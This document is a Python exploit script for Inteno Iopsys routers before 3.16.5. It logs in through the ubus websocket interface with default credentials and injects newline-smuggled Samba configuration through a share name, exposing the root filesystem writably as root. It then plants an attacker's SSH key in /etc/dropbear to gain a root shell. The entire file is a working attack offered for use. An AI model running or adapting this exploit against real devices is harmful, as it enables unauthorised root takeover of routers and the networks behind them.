1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180
|
import json import sys import os import time import argparse from websocket import create_connection from impacket.smbconnection import SMBConnection from impacket.examples.smbclient import MiniImpacketShell
""" Root filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5
Usage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host>
Requires: impacket websocket-client
On Windows: pyreadline
"""
def ubusAuth(host, username, password): """ https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py """ ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"]) req = json.dumps({ "jsonrpc": "2.0", "method": "call", "params": [ "00000000000000000000000000000000","session","login", {"username": username,"password": password} ], "id": 666 }) ws.send(req) response = json.loads(ws.recv()) ws.close() try: key = response.get('result')[1].get('ubus_rpc_session') except IndexError: return None return key
def ubusCall(host, key, namespace, argument, params={}): """ https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py """ ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"]) req = json.dumps({"jsonrpc": "2.0", "method": "call", "params": [key,namespace,argument,params], "id": 666}) ws.send(req) response = json.loads(ws.recv()) ws.close() try: result = response.get('result')[1] except IndexError: if response.get('result')[0] == 0: return True return None return result
def auth(host, user, password): print("Authenticating...") key = ubusAuth(host, user, password) if not key: print("[-] Auth failed!") sys.exit(1) print(f"[+] Auth successful") return key
def smb_put(args): username = "" password = ""
try: smbClient = SMBConnection(args.host, args.host, sess_port=445) smbClient.login(username, password, args.host)
print("Reading SSH key") try: with open(args.key_path, "r") as fd: sshkey = fd.read() except IOError: print(f"[-] Error reading {args.sshkey}") print("Creating temp file for authorized_keys") try: with open("authorized_keys", "w") as fd: fd.write(sshkey) path = os.path.realpath(fd.name) except IOError: print("[-] Error creating authorized_keys")
shell = MiniImpacketShell(smbClient) shell.onecmd("use pwned") shell.onecmd("cd /etc/dropbear") shell.onecmd(f"put {fd.name}")
print("Cleaning up...") os.remove(path) except Exception as e: print("[-] Error connecting to SMB share:") print(str(e)) sys.exit(1)
def main(args): payload = "pwned]\npath=/\nguest ok=yes\nbrowseable=yes\ncreate mask=0755\nwriteable=yes\nforce user=root\n[abc" key = auth(args.host, args.user, args.passwd) print("Adding Samba share...") smbcheck = json.dumps(ubusCall(args.host, key, "uci", "get", {"config":"samba"})) if "pwned" in smbcheck: print("[*] Samba share seems to already exist, skipping") else: smba = ubusCall(args.host, key, "uci", "add", { "config": "samba", "type":"sambashare", "values": { "name": payload, "read_only": "no", "create_mask":"0775", "dir_mask":"0775", "path": "/mnt/", "guest_ok": "yes" } }) if not smba: print("[-] Adding Samba share failed!") sys.exit(1)
print("Enabling Samba...") smbe = ubusCall(args.host, key, "uci", "set", {"config":"samba", "type":"samba", "values": {"interface":"lan"}}) if not smbe: print("[-] Enabling Samba failed!") sys.exit(1)
print("Committing changes...") smbc = ubusCall(args.host, key, "uci", "commit", {"config":"samba"}) if not smbc: print("[-] Committing changes failed!") sys.exit(1) if args.key_path: time.sleep(2) smb_put(args) print(f"[+] Exploit complete. Try \"ssh -i id_rsa root@{args.host}\"") else: print("[+] Exploit complete, SMB share added.")
def parse_args(args): """ Create the arguments """ parser = argparse.ArgumentParser() parser.add_argument("-u", dest="user", help="Username", default="user") parser.add_argument("-p", dest="passwd", help="Password", default="user") parser.add_argument("-k", dest="key_path", help="Public ssh key path") parser.add_argument(dest="host", help="Target host")
if len(sys.argv) < 2: parser.print_help() sys.exit(1)
return parser.parse_args(args)
if __name__ == "__main__": main(parse_args(sys.argv[1:]))
|